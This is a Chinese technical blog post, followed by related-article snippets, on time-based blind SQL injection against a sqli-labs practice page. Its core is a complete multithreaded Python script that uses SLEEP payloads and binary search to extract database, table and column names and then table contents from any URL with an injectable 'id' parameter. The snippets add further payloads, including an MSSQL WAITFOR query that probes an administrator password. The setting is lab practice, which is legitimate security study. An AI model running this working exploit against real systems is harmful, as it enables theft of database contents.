二分法进行时间盲注

最新推荐文章于 2025-02-13 18:54:24 发布
最新推荐文章于 2025-02-13 18:54:24 发布
阅读量165 收藏
点赞数 3
CC 4.0 BY-SA版权
文章标签: 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/liu_ziqian/article/details/145609095

        时间盲注(Time-Based Blind SQL Injection)是一种SQL注入技术,攻击者通过观察数据库响应时间的差异来推断数据库中的信息。以下是时间盲注中常用的函数和步骤,用于获取表名、列名和具体数据

下面是二分算法进行查找:

import requests
import concurrent.futures
import time
 
def binary_search_character(url, query, index, low=32, high=128):
    while low < high:
        mid = (low + high + 1) // 2
        payload = f"1' AND IF(ASCII(SUBSTRING(({query}),{index},1)) >= {mid}, SLEEP(2), 0) -- "
        res = {"id": payload}
        
        start_time = time.time()
        r = requests.get(url, params=res)
        response_time = time.time() - start_time
        
        if response_time > 1.5:
            low = mid
        else:
            high = mid - 1
 
    return chr(low) if low > 32 else ''

时间盲注的原理

  • SLEEP(2): 如果条件为真,服务器会延迟 2 秒响应。
  • 通过 time.time() 计算请求的响应时间,判断是否触发了 SLEEP()
  • 逐字符采用二分法减少请求次数,提高提取效率。

 

def extract_data(url, query, max_length=200):
    extracted_data = [''] * max_length
    
    with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
        future_to_index = {executor.submit(binary_search_character, url, query, i): i for i in range(1, max_length + 1)}
        
        for future in concurrent.futures.as_completed(future_to_index):
            index = future_to_index[future]
            try:
                result = future.result()
                if result:
                    extracted_data[index - 1] = result
                    print(f": {''.join(extracted_data).strip()}")
            except Exception as exc:
                print(f"Error extracting character {index}: {exc}")
    
    return ''.join(extracted_data).strip()
 
if __name__ == '__main__':
    url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'
    database_name = extract_data(url, "SELECT database()")
    print(f"数据库名: {database_name}")
 
    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
    table_names = extract_data(url, table_name_query)
    print(f"表名: {table_names}")
 
    table_name = table_names.split(',')[0]
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
    column_names = extract_data(url, column_name_query)
    print(f"列名: {column_names}")
 
    column_name = column_names.split(',')[1]
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
    extracted_values = extract_data(url, data_query)
    print(f"数据: {extracted_values}")

liu_ziqian
关注
SQL入-时间盲注
dkxkl1314的博客
03-11 969
就是在SQL入过程中,SQL语句执行后,查询到的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲。时间忙住特性在页面中,不管用户输入什么,数据交互完成以后目标网站没有错误和正确的页面回显,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构造闭合。如下图不管我们输入什么,页面显示结果都是一样的1、判断是否存在入2、获取数据库长度3、逐字猜解数据库名4、猜解表名数量5、猜解某个表名长度6、逐字猜解表名。
【CTF_流量日志分析】二分法分析
serendipity1130的博客
10-16 2231
1.打开日志文件发现又是一道二分法流量,观察任意几条: 分析过程: 当状态码位200的时候,表示正确,报错为404,所以第21位大于101正确,大于102报错,所以正确字符为101,所以盲出来的字符串应该是状态码等于200时的字符或等于404时的ascii码减去1 2.根据以上分析写出脚本: import urllib.parse import requests,re f = open('日志里的秘密.log','r',encoding='gb18030',errors='ignore
二分法
qq_43756333的博客
05-25 3389
在学sql盲脚本的时候碰到了使用二分法字段的情况,学习一下。 环境: [CISCN2019 华北赛区 Day2 Web1]Hack World 复现地址:BUUCTF 打开题目 直接告诉了flag在flag表和flag列里,让我们提交id。 这道题过滤了一些字段以及常用入语句,可以用Burpsuite来fuzz测试一下,如下所示,长度为482的代表被过滤 最后使用的方法是异或入,有关异或入的原理,可参考异或入 直接给出payload:1^(if((ascii(substr((select
二分法实现SQL盲
小菜猴子_x
09-12 1308
因为在buu上做题,然后无奈研究二分法实现SQL盲
一天一道ctf 第47天(二分法
scrawman的博客
07-29 388
[BSidesCF 2019]Kookie 看样子是要我们以admin登录,线索是cookie。只要抓包添加cookie:username=admin就行了(???) [WUSTCTF2020]颜值成绩查询
PHP正则表达式二分法实现mysql盲脚本
weixin_30348519的博客
04-29 174
$sUrl = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'; $sPost = 'inject=Inject&injection='; $sCharset = 'ABCDEF0123456789'; /* for every character */ for ($i=0, $hash=''; $i<32; ++$i) { ...
python的sqli-labs15的二分法时间盲注
Programmonkeykin的博客
12-11 4264
1.导入库。 2.按ASCII码从小到大编写常见的符号、字符、数字。 3.编写实验对应库的地址,这里的url根据自己的实际状况而言。 编写get_length函数: 其二分实现的完整代码如下: Payload="admin'andif((length(({}))={}),sleep(2),if((length(({}))>{}),sleep(3),1))#".format(data_payload,n,data_payload,n) 即,如果我们定义的数据长度n刚好等于我们..
二分查找sql时间盲注,布尔盲
weixin_72380152的博客
02-13 1189
此时,浏览器上方转圈圈转了三秒,说明存在时间盲注,此时用python脚本遍历的方法大致跟布尔盲一样,只需要将sql条件入写到if()中1=1的位置即可。可以看到对sql查询有结果的话显示的页面是"You are in...........",没结果则不显示,此时可以使用sqlmap软件去进行盲查找,也可以使用sql脚本去遍历查找自己所需的值。可以看出无论sql正确与否,查到或者未查到显示的页面都是一样的,但是还是存在时间盲注:可以用if(1=1,sleep(3),1)测试一下。
sql入之盲(bool盲,时间盲注)
m0_73994306的博客
02-13 574
当页面,但能通过间接判断SQL语句执行结果时。
多线程+二分法的巧用——通达OA SQL盲1
08-03
SQL盲(SQL Blind Injection)是一种常见的网络安全漏洞,攻击者通过发送特定的SQL查询,利用服务器的响应时间或状态来推断数据库的信息。在这个案例中,我们将讨论如何在通达OA系统中利用SQL盲获取管理员的...
sql盲二分法入脚本
菜鸟-传奇
12-27 1104
sql盲二分法入脚本 次脚本可以用来检测sql靶场第五关 http://caichuanqi.cn/lab/sqli-labs-master/Less-5/?id=1 #-*-coding:utf-8-*- import requests import time #host = "http://web.jarvisoj.com:32787/login.php" host = "http:...
[SQL盲][极客大挑战 2019]FinalSQL(二分法)
Y4tacker的博客
08-16 6191
发现过滤了一堆比如*空格之类的我们用()绕过上脚本, 网站太垃圾了请求的快,就要出错,还要加一个sleep等一下 import time import requests url = "http://34e5371d-f910-48da-ae2e-26ed2b56eb8d.node3.buuoj.cn/search.php?id=" result = '' i = 0 while True: i = i + 1 head = 32 tail = 127 while h
实验吧——who are you?(insert into二分法 时间盲注
weixin_30947043的博客
10-13 176
题目地址:http://ctf5.shiyanbar.com/web/wonderkun/index.php 根据提示 “我要把攻击我的人都记录db中去!” 猜测这是insert into入,会向数据库储存ip地址,所以入点便是我们的ip,而ip可以用X-Forwarded-For伪造 由于入点的特殊,这里入是不能用逗号的,因为服务器在从X-Forwarded-Fo...
sql盲二分查找法
2302_78449782的博客
02-13 532
sqli-labs第八关是单引号字符型入,且页面只有正确或错误两种响应,没有数据回显,所以适合布尔盲。由于手工入效率太慢,我们想要一个针对第八关的完整利用脚本,可以使用二分法来提高效率。二分法可以快速缩小字符ASCII值的范围,减少请求次数。每次猜测中间值,根据响应调整高低区间,直到确定准确的ASCII值。在实现时,需要意以下几点:1. 使用requests库发送HTTP请求,正确处理参数和URL。2. 二分法的循环逻辑要正确,确保每次都能正确调整low和high。
利用二分法进行 SQL 时间盲注
智商不在服务区的博客
02-10 1166
SQL 盲(Blind SQL Injection)是一种常见的 Web 安全漏洞,其中。
mysql 盲二分法python脚本
weixin_30384217的博客
04-29 1398
import urllib import urllib2 def doinject(payload): url = 'xxxxxxxxxxxxxxxxxxxxx' values = {'injection':payload,'inject':'Inject'} data = urllib.urlencode(values) #print d...
二分查找在sql盲里面的应用
0verWatch的博客
08-27 2718
前言 最近在重新复习SQL入用了sqllabs这个靶场,发现在做盲的时候自己写的脚本,就一直自增去盲的话时间花费太大,所以就在看了看二分查找在这一方面的应用 确实快了不少,很久没有写过小脚本就手有点生疏了,赶紧记录一下 正文 二分查找又称折半查找,优点是比较次数少,查找速度快,平均性能好;其缺点是要求待查表为有序表,且插入删除困难。因此,折半查找方法适用于不经常变动而查找频繁的有序列...
二分法更OK的盲多线程(python脚本)
jpygx123的博客
11-21 1524
 废话不多说直接上代码: import threading import requests user_agent = [ "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5", "Mozilla/5...
sql时间盲注
最新发布
04-01
### SQL 时间盲注的原理 SQL时间盲注是一种基于布尔逻辑的时间延迟攻击方法,通过观察目标数据库在执行特定查询后的响应时间差异来推断数据的存在与否。其核心在于向服务器发送带有条件语句的恶意输入,并触发数据库中的等待操作(如 `WAITFOR` 或 `SLEEP`),从而间接获取敏感信息。 #### 条件判断与时间延迟机制 当攻击者构建一个包含时间延迟函数的 SQL 查询时,如果条件成立,则会强制数据库暂停一段时间再返回结果;反之则立即返回。这种特性使得即使无法直接看到错误消息或页面变化,也可以依据响应时间推测出隐藏的数据[^2]。 例如,在以下示例中: ```sql '; IF (SELECT COUNT(username) FROM Users WHERE username = 'Administrator' AND SUBSTRING(password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'-- ``` 此代码片段尝试检测管理员密码的第一个字母是否大于字符 `'m'`。如果是的话,数据库将会延迟指定秒数 `{delay}` 后才给出回应[^1]。 --- ### 实现方法概述 为了成功实施一次时间盲注攻击,通常需要经历以下几个方面的探索: #### 1. **确认环境支持** 不同的关系型数据库管理系统(RDBMS),比如 MySQL、PostgreSQL 和 MSSQL 等,各自拥有独特的语法用于引入人为延时。因此首先要弄清楚后台运行的具体 RDBMS 类型及其版本号以便调整相应的 payload 构造策略[^3]。 对于 Microsoft SQL Server(MSSQL), 可采用如下形式制造固定毫秒级停顿效果: ```sql WAITFOR DELAY 'HH:mm:ss' ``` 而在针对 MariaDB/MySQL 的场景下可以运用内置过程 sleep() 函数达成相似目的 : ```sql SLEEP(seconds) ``` #### 2. **二分法查找具体数值** 一旦验证了某个字段确实可以通过时间差反馈信息之后,下一步就是精确提取该字段的实际内容。这往往借助于经典的二分查找算法完成——即不断缩小范围直至锁定确切字节值为止。 假设我们已经知道某条记录对应列存储的是字符串类型数据且总长度不超过N位(可通过前期试探得知),那么可以从第一位开始逐个解析每一位可能取值直到整个串被还原出来为止: - 首先设定初始区间 `[a,b]=[ASCII_MIN, ASCII_MAX]`; - 计算中间点 c=(a+b)/2; - 发送请求询问当前处理位置处实际字符编码是否小于等于c; - 如果得到肯定答复(a<=target_char<=c),更新右边界 b=c ; - 若不然(target_char>c),相应修改左端 a=c+1 . 重复上述步骤直至上下限重合唯一解出现即可结束本轮迭代进入下一个待定索引继续相同流程... --- ### 完整案例分析 下面提供了一个完整的 Python 脚本样例演示如何自动化地利用时间盲注漏洞读取出远程主机上的用户名列表成员名称首字母情况作为教学用途展示,请意合法合规前提下方可实践演练! ```python import requests from string import ascii_lowercase url = "http://example.com/vulnerable_endpoint" true_delay = 5 # 秒 def check_condition(payload): """Send request with given payload and measure response time.""" start_time = time.time() res = requests.post(url, data={"input": payload}) elapsed = time.time() - start_time return elapsed >= true_delay for char in ascii_lowercase: test_payload = f"';IF((SELECT TOP 1 LEFT(name,1) FROM users)='{char}') WAITFOR DELAY '0:0:{true_delay}';--" if check_condition(test_payload): print(f"Found matching character: {char}") break ``` 以上脚本逐一试验英文字母表里的每一个小写字母看哪个能够引起预期之外延长加载现象发生进而得出结论说那个特殊符号正好匹配上了现存真实存在的那一位有效成分组成要素部分而已啦!当然这只是非常基础简单的示范仅供参考学习研究价值所在之处哈😊 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值